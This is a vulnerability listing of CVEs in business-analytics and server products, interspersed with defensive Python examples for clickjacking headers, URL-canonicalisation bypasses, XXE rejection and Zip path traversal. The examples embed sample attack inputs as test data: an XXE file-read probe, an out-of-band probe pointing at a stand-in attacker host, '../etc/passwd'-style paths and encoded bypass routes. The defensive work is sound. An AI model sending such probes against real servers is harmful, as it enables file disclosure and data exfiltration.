Business Server Security Vulnerabilities

CVE-2024-28982
Hitachi Vantara Pentaho Business Analytics Server versions before 10.1.0.0 and 9.3.0.7, including 8.3.x do not correctly protect the ACL service endpoint of the Pentaho User Console against XML External Entity...
CVSS: 7.1 | AI Score: 7 | EPSS: 0.0004 | 2024-06-26 11:15 PM

CVE-2024-28984
Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x allow a malicious URL to inject content into the Analyzer plugin...
CVSS: 8.8 | AI Score: 8.6 | EPSS: 0.0004 | 2024-06-26 11:15 PM

CVE-2024-28983
Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x allow a malicious URL to inject content into the Analyzer plugin...
CVSS: 8.8 | AI Score: 8.6 | EPSS: 0.0004 | 2024-06-26 11:15 PM

CVE-2024-2003
Local privilege escalation vulnerability allowed an attacker to misuse ESET's file operations during a restore operation from...
CVSS: 7.3 | AI Score: 7.4 | EPSS: 0.0004 | 2024-06-21 08:15 AM

CVE-2024-33620
Absolute path traversal vulnerability exists in ID Link Manager and FUJITSU Software TIME CREATOR. If this vulnerability is exploited, the file contents including sensitive information on the server may be retrieved by an unauthenticated remote...
AI Score: 6.8 | EPSS: 0.0004 | 2024-06-18 06:15 AM

CVE-2024-34684
On Unix, SAP BusinessObjects Business Intelligence Platform (Scheduling) allows an authenticated attacker with administrator access on the local server to access the password of a local account. As a result, an attacker can obtain non-administrative user credentials, which will allow them to read.....
CVSS: 3.7 | AI Score: 4.2 | EPSS: 0.0004 | 2024-06-11 03:15 AM

CVE-2024-32047
Hard-coded credentials for the CyberPower PowerPanel test server can be found in the production code. This might result in an attacker gaining access to the testing or production...
CVSS: 9.8 | AI Score: 6.7 | EPSS: 0.0004 | 2024-05-15 08:15 PM

CVE-2024-33615
A specially crafted Zip file containing path traversal characters can be imported to the CyberPower PowerPanel server, which allows file writing to the server outside the intended scope, and could allow an attacker to achieve remote code ...
CVSS: 8.8 | AI Score: 7.4 | EPSS: 0.0004 | 2024-05-15 08:15 PM

CVE-2024-30214
The application allows a high privilege attacker to append a malicious GET query parameter to Service invocations, which are reflected in the server response. Under certain circumstances, if the parameter contains a JavaScript, the script could be processed on client...
CVSS: 4.8 | AI Score: 6.5 | EPSS: 0.0004 | 2024-04-09 01:15 AM

CVE-2024-20695
Skype for Business Information Disclosure...
CVSS: 5.7 | AI Score: 6.2 | EPSS: 0.0005 | 2024-02-13 06:15 PM

CVE-2023-4757
The Staff / Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious javascript which could.....
CVSS: 5.4 | AI Score: 5.4 | EPSS: 0.0004 | 2024-01-16 04:15 PM

CVE-2023-41763
Skype for Business Elevation of Privilege...
CVSS: 5.3 | AI Score: 7.1 | EPSS: 0.051 | 2023-10-10 06:15 PM | In Wild

CVE-2023-36789
Skype for Business Remote Code Execution...
CVSS: 7.2 | AI Score: 7.2 | EPSS: 0.002 | 2023-10-10 06:15 PM

CVE-2023-36786
Skype for Business Remote Code Execution...
CVSS: 7.2 | AI Score: 7.2 | EPSS: 0.002 | 2023-10-10 06:15 PM

CVE-2023-36780
Skype for Business Remote Code Execution...
CVSS: 7.2 | AI Score: 7.2 | EPSS: 0.002 | 2023-10-10 06:15 PM

CVE-2023-3589
A Cross-Site Request Forgery (CSRF) vulnerability affecting Teamwork Cloud from No Magic Release 2021x through No Magic Release 2022x could allow with some very specific conditions an attacker to send a specifically crafted query to the...
CVSS: 7.5 | AI Score: 7.5 | EPSS: 0.001 | 2023-10-09 09:15 AM

CVE-2023-4505
The Staff / Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative...
CVSS: 4.9 | AI Score: 5.2 | EPSS: 0.001 | 2023-09-27 03:19 PM

CVE-2023-2358
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.5.0.0 and 9.3.0.4, including 8.3.x.x, saves passwords of the Hadoop Copy Files step in...
CVSS: 4.9 | AI Score: 5.1 | EPSS: 0.0005 | 2023-09-27 03:18 PM

CVE-2023-22021
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
CVSS: 4.3 | AI Score: 4.1 | EPSS: 0.0004 | 2023-07-18 09:15 PM

CVE-2023-22027
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
CVSS: 4.3 | AI Score: 4.2 | EPSS: 0.0004 | 2023-07-18 09:15 PM

CVE-2023-22020
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
CVSS: 5.4 | AI Score: 5.1 | EPSS: 0.0005 | 2023-07-18 09:15 PM

CVE-2023-22013
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
CVSS: 4.3 | AI Score: 4.1 | EPSS: 0.0005 | 2023-07-18 09:15 PM

CVE-2023-22011
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to...
CVSS: 5.4 | AI Score: 5.2 | EPSS: 0.0004 | 2023-07-18 09:15 PM

CVE-2023-22012
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
CVSS: 4.3 | AI Score: 4.1 | EPSS: 0.0005 | 2023-07-18 09:15 PM

CVE-2023-3140
Missing HTTP headers (X-Frame-Options, Content-Security-Policy) in KNIME Business Hub before 1.4.0 has left users vulnerable to click jacking. Clickjacking is an attack that occurs when an attacker uses a transparent iframe in a window to trick a user into clicking on an actionable item, such...
CVSS: 4.3 | AI Score: 4.6 | EPSS: 0.001 | 2023-06-07 10:15 AM

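The KNIME Business Hub entry above (CVE-2023-3140) is a missing-header finding: without X-Frame-Options or a Content-Security-Policy frame-ancestors directive, any site can frame the application. The classifier below is an added example written for this page, not code from KNIME or from the listing's source. It evaluates a response's headers the way a browser would (a frame-ancestors directive takes precedence over X-Frame-Options; a Report-Only policy is not enforced) and runs over constructed header sets, including the hardened pair an operator would deploy.

```python
from __future__ import annotations


def framing_policy(headers: dict[str, str]) -> str:
    """Classify how a response restricts being embedded in a frame.

    Returns one of:
      "deny"        no origin may frame it (XFO DENY or CSP frame-ancestors 'none')
      "restricted"  only listed origins may (SAMEORIGIN, 'self', or an allowlist)
      "unprotected" anyone may: no header, a wildcard, or a report-only policy,
                    which browsers log but do not enforce.

    If a Content-Security-Policy carries frame-ancestors it wins over
    X-Frame-Options, matching browser behaviour.
    """
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = [t.strip("'").lower() for t in tokens[1:]]
            # An empty source list is equivalent to 'none' per the CSP spec.
            if not sources or sources == ["none"]:
                return "deny"
            if "*" in sources:
                return "unprotected"
            return "restricted"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "deny"
    if xfo == "SAMEORIGIN":
        return "restricted"
    # Absent, or a value browsers ignore (ALLOWALL, the obsolete ALLOW-FROM).
    return "unprotected"


# Constructed header sets for the demonstration; not captured from any product.
SAMPLES: dict[str, dict[str, str]] = {
    "no headers": {},
    "xfo deny": {"X-Frame-Options": "DENY"},
    "xfo sameorigin": {"x-frame-options": "sameorigin"},
    "csp none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp allowlist": {"Content-Security-Policy": "frame-ancestors 'self' https://portal.example"},
    "csp wildcard": {"Content-Security-Policy": "frame-ancestors *"},
    "report-only": {"Content-Security-Policy-Report-Only": "frame-ancestors 'none'"},
    "csp overrides xfo": {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors https://portal.example",
    },
}

# The pair to ship: XFO for legacy browsers, CSP for everything current.
HARDENED = {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'"}


def audit(samples: dict[str, dict[str, str]] = SAMPLES) -> dict[str, str]:
    """Run the classifier over every sample and return name -> verdict."""
    return {name: framing_policy(hdrs) for name, hdrs in samples.items()}


if __name__ == "__main__":
    for name, verdict in audit().items():
        print(f"{name:20s} {verdict}")
    print(f"{'hardened':20s} {framing_policy(HARDENED)}")
```

The same function can be pointed at live responses (for example the headers returned by an HTTP client) to confirm a fix landed on every route, not only the login page.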
CVE-2023-1158
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.3, including 8.3.x expose dashboard prompts to users who are not part of the authorization...
CVSS: 4.3 | AI Score: 4.7 | EPSS: 0.0005 | 2023-05-24 10:15 PM

CVE-2022-4815
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.3, including 8.3.x deserialize untrusted JSON data without constraining the parser to approved classes and...
CVSS: 8.8 | AI Score: 8.6 | EPSS: 0.001 | 2023-05-24 10:15 PM

CVE-2023-25131
Use of default password vulnerability in PowerPanel Business Local/Remote for Windows v4.8.6 and earlier, PowerPanel Business Management for Windows v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 32bit v4.8.6 and earlier, PowerPanel Business Local/Remote for Linux 64bit v4.8.6 and.....
CVSS: 9.8 | AI Score: 9.5 | EPSS: 0.005 | 2023-04-24 10:15 AM

CVE-2023-21965
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
CVSS: 5.7 | AI Score: 5.4 | EPSS: 0.001 | 2023-04-18 08:15 PM

CVE-2023-21952
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Analytics Server). The supported version that is affected is 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle...
CVSS: 5.7 | AI Score: 5.4 | EPSS: 0.001 | 2023-04-18 08:15 PM

CVE-2022-43770
Hitachi Vantara Pentaho Business Analytics Server versions before 9.3.0.0, 9.2.0.4 and 8.3.0.27 does not correctly perform an authorization check in the dashboard editor plugin...
CVSS: 8.1 | AI Score: 8 | EPSS: 0.001 | 2023-04-11 04:15 PM

CVE-2022-3695
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.3.0.0, 9.2.0.4 and 8.3.0.27 allow a malicious URL to inject content into a dashboard when the CDE plugin is...
CVSS: 6.5 | AI Score: 6.2 | EPSS: 0.0005 | 2023-04-11 04:15 PM

CVE-2023-29185
SAP NetWeaver AS for ABAP (Business Server Pages) - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an attacker authenticated as a non-administrative user to craft a request with certain parameters in certain circumstances which can consume the server's resources...
CVSS: 6.5 | AI Score: 6.2 | EPSS: 0.001 | 2023-04-11 04:16 AM

CVE-2022-4770
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the full parametrized SQL query in an error message when an invalid character is used within a Pentaho Report...
CVSS: 4.3 | AI Score: 5 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-43939
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x contain security restrictions using non-canonical URLs which can be...
CVSS: 9.8 | AI Score: 9.4 | EPSS: 0.003 | 2023-04-03 07:15 PM

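CVE-2022-43939 above is the classic shape of an authorization bypass: the access rule is matched against the URL as the client sent it, so an encoded, dotted or doubled-slash spelling of a restricted path does not match the rule but still routes to the restricted handler. The snippet below is an added example for this page, not Pentaho code, and the restricted prefix /api/admin is a hypothetical route chosen for illustration. It contrasts a naive prefix check with one that canonicalises the path first (bounded repeated percent-decoding, matrix-parameter stripping, and POSIX normalisation), and shows which constructed bypass spellings each one catches.

```python
from __future__ import annotations

import posixpath
from urllib.parse import unquote

# Hypothetical restricted route for the example; not a real product endpoint.
RESTRICTED: tuple[str, ...] = ("/api/admin",)


def canonical_path(raw: str) -> str:
    """Reduce a request path to the single form the router will actually use."""
    path = raw.split("?", 1)[0].split("#", 1)[0]
    # Decode repeatedly but boundedly, so a double-encoded %252e does not
    # survive one pass as %2e and get decoded later by the framework.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop matrix parameters (";jsessionid=...") that servlet containers strip
    # from each segment before routing.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # Collapse "//", "/./" and "/../". Anchoring at a single leading "/" keeps
    # ".." from climbing above the root and avoids posixpath preserving "//".
    return posixpath.normpath("/" + path.lstrip("/"))


def naive_is_restricted(raw: str) -> bool:
    """The bypassable check: match the rule against the raw request path."""
    return raw.startswith(RESTRICTED)


def canonical_is_restricted(raw: str) -> bool:
    """The hardened check: canonicalise first, then match on whole segments
    so that /api/administrators is not caught by the /api/admin rule."""
    path = canonical_path(raw)
    return any(path == p or path.startswith(p + "/") for p in RESTRICTED)


# Constructed bypass spellings of the hypothetical restricted route.
BYPASS_ATTEMPTS = [
    "/api/./admin",
    "/api//admin",
    "//api/admin",
    "/api/x/../admin",
    "/api/%61dmin",
    "/api/%252e/admin",
    "/api;jsessionid=abc/admin",
    "/api/admin/",
]


def compare(paths: list[str] = BYPASS_ATTEMPTS) -> dict[str, tuple[bool, bool]]:
    """Return raw path -> (naive verdict, canonical verdict)."""
    return {p: (naive_is_restricted(p), canonical_is_restricted(p)) for p in paths}


if __name__ == "__main__":
    for raw, (naive, canon) in compare().items():
        print(f"{raw:30s} naive={naive!s:5s} canonical={canon}")
```

The important property is that the check runs on the same representation the dispatcher uses; if the framework decodes or normalises after the filter, the filter is comparing against a string the handler will never see.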
CVE-2022-43938
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x cannot allow a system administrator to disable scripting capabilities of Pentaho Reports (*.prpt) through the JVM script...
CVSS: 8.8 | AI Score: 8.3 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-43941
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x do not correctly protect the Post Analysis service endpoint of the data access plugin against out-of-band XML External Entity...
CVSS: 7.1 | AI Score: 6.5 | EPSS: 0.001 | 2023-04-03 07:15 PM

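Two entries in this listing are XML External Entity findings against service endpoints: CVE-2024-28982 (the ACL service endpoint of the Pentaho User Console) and CVE-2022-43941 above (out-of-band XXE in the Post Analysis service endpoint). Both are the same root cause, a parser that honours DOCTYPE declarations on a body that never legitimately needs one. The block below is an added example written for this page, not Pentaho code and not the fix the vendor shipped; it shows the simplest robust mitigation, refusing any DTD before the parser can resolve a single entity, using Python's expat bindings. The sample bodies are constructed: a benign ACL-style document, a classic in-band file-read probe, and an out-of-band parameter-entity probe pointing at a non-routable host.

```python
from __future__ import annotations

import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when a document carries a DOCTYPE or entity declaration."""


def parse_without_dtd(data: bytes) -> list[str]:
    """Parse an XML body and return its element names in document order.

    Any DOCTYPE or entity declaration aborts the parse before an external
    reference can be resolved. Endpoints that only ever expect plain markup
    have no legitimate use for a DTD, so rejecting it outright closes both
    in-band (file read) and out-of-band (parameter entity) XXE.
    """
    names: list[str] = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE for <{name}> rejected (sysid={sysid!r})")

    def on_entity_decl(*_args):
        raise DtdRejected("entity declaration rejected")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Belt and braces: never fetch external parameter entities even if a
    # future change wires a DTD through.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = lambda name, _attrs: names.append(name)
    parser.Parse(data, True)
    return names


def is_safe_xml(data: bytes) -> bool:
    """True when the body parses with no DTD; False when it is rejected or malformed."""
    try:
        parse_without_dtd(data)
        return True
    except (DtdRejected, expat.ExpatError):
        return False


# Constructed sample bodies; not taken from any product's real payload format.
BENIGN_ACL = b"""<?xml version="1.0"?>
<acl><entry user="alice" perm="read"/><entry user="bob" perm="write"/></acl>"""

# In-band probe: the entity value would be echoed back in the response.
XXE_PROBE = b"""<?xml version="1.0"?>
<!DOCTYPE acl [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<acl><entry user="&xxe;" perm="read"/></acl>"""

# Out-of-band probe: nothing is echoed, the parser is made to fetch a remote DTD.
OOB_PROBE = b"""<?xml version="1.0"?>
<!DOCTYPE acl [ <!ENTITY % ext SYSTEM "http://attacker.invalid/evil.dtd"> %ext; ]>
<acl/>"""


if __name__ == "__main__":
    print(parse_without_dtd(BENIGN_ACL))
    for label, body in (("in-band", XXE_PROBE), ("out-of-band", OOB_PROBE)):
        print(label, "accepted" if is_safe_xml(body) else "rejected")
```

Rejecting the DOCTYPE is preferable to trying to enumerate dangerous entity types: the out-of-band case never references the entity in the body at all, so a filter that only watches for `&name;` in content would pass it.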
CVE-2022-4771
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow a malicious URL to inject content into the Pentaho User Console through session...
CVSS: 6.1 | AI Score: 6.2 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-43940
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x do not correctly perform an authorization check in the data source management...
CVSS: 8.8 | AI Score: 8.6 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-4769
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the target path on host when a file is uploaded with an invalid character in its...
CVSS: 4.3 | AI Score: 4.6 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-43771
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.0 and 9.3.0.1, including 8.3.x, using the Pentaho Data Access plugin exposes a service endpoint for CSV import which allows a user supplied path to access resources that are out of...
CVSS: 6.5 | AI Score: 6.4 | EPSS: 0.001 | 2023-04-03 07:15 PM

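Three entries in this listing are the same defect in different clothing: CVE-2024-33620 (absolute path traversal on a file read), CVE-2024-33615 (a Zip import whose entry names carry path traversal characters and write outside the intended directory), and CVE-2022-43771 above (a CSV import endpoint that follows a user-supplied path out of its intended scope). The block below is an added example for this page, not code from Fujitsu, CyberPower or Hitachi Vantara. One helper resolves a user-supplied name under a base directory and refuses anything absolute or escaping; it is then applied to a read path and to Zip extraction. The archive is constructed in memory with one benign entry, one `../` entry and one absolute-path entry, and the extraction runs in a temporary directory.

```python
from __future__ import annotations

import io
import os
import tempfile
import zipfile
from pathlib import Path


def resolve_under(base: str, user_path: str) -> Path | None:
    """Return the real path of user_path inside base, or None if it escapes.

    Rejects absolute paths outright (the absolute-traversal case) and any
    name that, once normalised and with symlinks followed, lands outside
    base (the "../" case). Backslashes are treated as separators so an
    archive built on Windows cannot smuggle "..\\" past a "/"-only check.
    """
    user_path = user_path.replace("\\", "/")
    if os.path.isabs(user_path) or Path(user_path).is_absolute():
        return None
    base_real = Path(base).resolve()
    candidate = (base_real / user_path).resolve()
    try:
        candidate.relative_to(base_real)  # component-wise, so /srv/data vs /srv/data2 is safe
    except ValueError:
        return None
    return candidate


def safe_extract(zip_bytes: bytes, dest: str) -> tuple[list[str], list[str]]:
    """Extract zip_bytes under dest, skipping entries that would land outside it.

    Returns (extracted relative names, rejected entry names).
    """
    extracted: list[str] = []
    rejected: list[str] = []
    dest_real = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = resolve_under(dest, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(str(target.relative_to(dest_real)))
    return extracted, rejected


def build_sample_zip() -> bytes:
    """Constructed archive: one benign entry, one '../' escape, one absolute path."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("reports/monthly.txt", "benign report")
        zf.writestr("../../outside.txt", "would escape the import directory")
        zf.writestr("/tmp/absolute.txt", "absolute path entry")
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Extract the sample archive into a scratch directory and report the verdicts."""
    with tempfile.TemporaryDirectory() as dest:
        return safe_extract(build_sample_zip(), dest)


if __name__ == "__main__":
    extracted, rejected = demo()
    print("extracted:", extracted)
    print("rejected: ", rejected)
    # The same helper guards a user-supplied read path (hypothetical base directory).
    for name in ("2024/q1.csv", "../etc/passwd", "/etc/passwd"):
        print(f"{name:15s} ->", "ok" if resolve_under("/srv/imports", name) else "refused")
```

Note what the check deliberately does not do: it never tries to strip "../" out of the name and carry on. Rewriting the name invites a second round of bypasses (e.g. "....//"); resolving and comparing against the base is the check that survives those.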
CVE-2022-3960
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x cannot allow a system administrator to disable scripting capabilities of the Community Dashboard Editor (CDE)...
CVSS: 6.3 | AI Score: 6.1 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-43772
Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.0 and 9.3.0.1, including 8.3.x with the Big Data Plugin expose the username and password of clusters in clear text into system...
CVSS: 6.5 | AI Score: 6.5 | EPSS: 0.001 | 2023-04-03 07:15 PM

CVE-2022-43769
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x allow certain web services to set property values which contain Spring templates that are interpreted...
CVSS: 8.8 | AI Score: 8.1 | EPSS: 0.562 | 2023-04-03 06:15 PM

CVE-2022-43773
Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x is installed with a sample HSQLDB data source configured with stored procedures...
CVSS: 8.8 | AI Score: 8.5 | EPSS: 0.001 | 2023-04-03 06:15 PM

CVE-2023-0100
In Eclipse BIRT, starting from version 2.6.2, the default configuration allowed to retrieve a report from the same host using an absolute HTTP path for the report parameter (e.g. __report=http://xyz.com/report.rptdesign). If the host indicated in the __report parameter matched the HTTP Host header....
CVSS: 8.8 | AI Score: 8.4 | EPSS: 0.001 | 2023-03-15 03:15 PM

CVE-2023-27894
SAP BusinessObjects Business Intelligence Platform (Web Services) - versions 420, 430, allows an attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal...
CVSS: 5.3 | AI Score: 5.3 | EPSS: 0.001 | 2023-03-14 06:15 AM

CVE-2023-27896
In SAP BusinessObjects Business Intelligence Platform - version 420, 430, an attacker can control a malicious BOE server, forcing the application server to connect to its own CMS, leading to a high impact on...
CVSS: 7.5 | AI Score: 7.4 | EPSS: 0.001 | 2023-03-14 06:15 AM

CVE-2023-27271
In SAP BusinessObjects Business Intelligence Platform (Web Services) - versions 420, 430, an attacker can control a malicious BOE server, forcing the application server to connect to its own admintools, leading to a high impact on...
CVSS: 7.5 | AI Score: 7.4 | EPSS: 0.001 | 2023-03-14 06:15 AM

CVE-2023-25617
SAP Business Object (Adaptive Job Server) - versions 420, 430, allows remote execution of arbitrary commands on Unix, when program objects execution is enabled, to authenticated users with scheduling rights, using the BI Launchpad, Central Management Console or a custom application based on the...
CVSS: 9 | AI Score: 8.7 | EPSS: 0.002 | 2023-03-14 05:15 AM

Total number of security vulnerabilities: 380